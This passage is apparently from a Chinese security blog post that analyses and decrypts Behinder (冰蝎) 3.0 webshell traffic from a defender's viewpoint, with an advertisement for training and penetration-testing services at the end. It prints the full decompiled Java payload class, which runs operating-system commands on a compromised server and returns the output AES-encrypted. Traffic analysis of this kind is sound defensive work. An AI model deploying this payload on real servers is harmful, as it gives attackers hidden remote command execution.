# print("加密值:",mi)
# s=aes_decode(data,key)
#print("解密值:",s)

a = aes_decode(data,key)
open('3.class','wb').write(a)

最后对生成的class 文件进行反编译

反编译后执行代码内容如下:


package net.rebeyond.behinder.payload.java;

import java.io.BufferedReader;
import java.io.InputStreamReader;
import java.nio.charset.Charset;
import java.util.HashMap;
import java.util.Map;
import javax.crypto.Cipher;
import javax.crypto.spec.SecretKeySpec;
import javax.servlet.ServletOutputStream;
import javax.servlet.ServletRequest;
import javax.servlet.ServletResponse;
import javax.servlet.http.HttpSession;
import javax.servlet.jsp.PageContext;

public class Cmd {
public static String cmd = "pwd";
private ServletRequest Request;
private ServletResponse Response;
private HttpSession Session;

public boolean equals(Object obj) {
PageContext page = (PageContext) obj;
this.Session = page.getSession();
this.Response = page.getResponse();
this.Request = page.getRequest();
page.getResponse().setCharacterEncoding("UTF-8");
Map<String, String> result = new HashMap<>();
try {
result.put("msg", RunCMD(cmd));
result.put("status", "success");
try {
} catch (Exception e) {
e.printStackTrace();
}
} catch (Exception e2) {
result.put("msg", e2.getMessage());
result.put("status", "success");
try {
} catch (Exception e3) {
e3.printStackTrace();
}
} finally {
try {
ServletOutputStream so = this.Response.getOutputStream();
so.write(Encrypt(buildJson(result, true).getBytes("UTF-8")));
so.flush();
so.close();
page.getOut().clear();
} catch (Exception e4) {
e4.printStackTrace();
}
}
return true;
}

private String RunCMD(String cmd2) throws Exception {
Process p;
Charset osCharset = Charset.forName(System.getProperty("sun.jnu.encoding"));
String result = "";
if (cmd2 == null || cmd2.length() <= 0) {
return result;
}
if (System.getProperty("os.name").toLowerCase().indexOf("windows") >= 0) {
p = Runtime.getRuntime().exec(new String[]{"cmd.exe", "/c", cmd2});
} else {
p = Runtime.getRuntime().exec(cmd2);
}
BufferedReader br = new BufferedReader(new InputStreamReader(p.getInputStream(), "GB2312"));
String disr = br.readLine();
String result2 = result;
while (disr != null) {
String result3 = result2 + disr + "n";
disr = br.readLine();
result2 = result3;
}
return new String(result2.getBytes(osCharset));
}

private byte[] Encrypt(byte[] bs) throws Exception {
SecretKeySpec skeySpec = new SecretKeySpec(this.Session.getAttribute("u").toString().getBytes("utf-8"), "AES");
Cipher cipher = Cipher.getInstance("AES/ECB/PKCS5Padding");
cipher.init(1, skeySpec);
return cipher.doFinal(bs);
}

private String buildJson(Map<String, String> entity, boolean encode) throws Exception {
StringBuilder sb = new StringBuilder();
String version = System.getProperty("java.version");
sb.append("{");
for (String key : entity.keySet()) {
sb.append(""" + key + "":"");
String value = ((String) entity.get(key)).toString();
if (encode) {
if (version.compareTo("1.9") >= 0) {
getClass();
Class Base64 = Class.forName("java.util.Base64");
Object Encoder = Base64.getMethod("getEncoder", null).invoke(Base64, null);
value = (String) Encoder.getClass().getMethod("encodeToString", new Class[]{byte[].class}).invoke(Encoder, new Object[]{value.getBytes("UTF-8")});
} else {
getClass();
Object Encoder2 = Class.forName("sun.misc.BASE64Encoder").newInstance();
value = ((String) Encoder2.getClass().getMethod("encode", new Class[]{byte[].class}).invoke(Encoder2, new Object[]{value.getBytes("UTF-8")})).replace("n", "").replace("r", "");
}
}
sb.append(value);
sb.append("",");
}
if (sb.toString().endsWith(",")) {
sb.setLength(sb.length() - 1);
}
sb.append("}");
return sb.toString();
}
}

还原请求内容 这里为pwd

冰蝎3.0流量分析与还原

可以看到pwd的结果被成功解密

冰蝎3.0流量分析与还原

总结:
遇到冰蝎3的时候不要过于慌张,这时候我们找到webshell 何时被部署、通过很么洞打进来的,找到webshell的存放位置,通过我们的全流量进行回溯,了解攻击者后续做了那些行为。

此篇文章通过防守方流量识别角度进行分析。并没有去说明一些UA的识别问题,毕竟BX是可以随意修改这些流量头的

后续文章陆续推出哥斯拉以及内存马的识别与流量分析特征的提取,后续协助大家自定义waf的监测规则。




  

承接CTF培训、出题【全系全套】
渗透测试项目(包括红蓝方向)、安全咨询项目


                                           wx :gnosismask

本文始发于微信公众号(黑伞攻防实验室):冰蝎3.0流量分析与还原

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: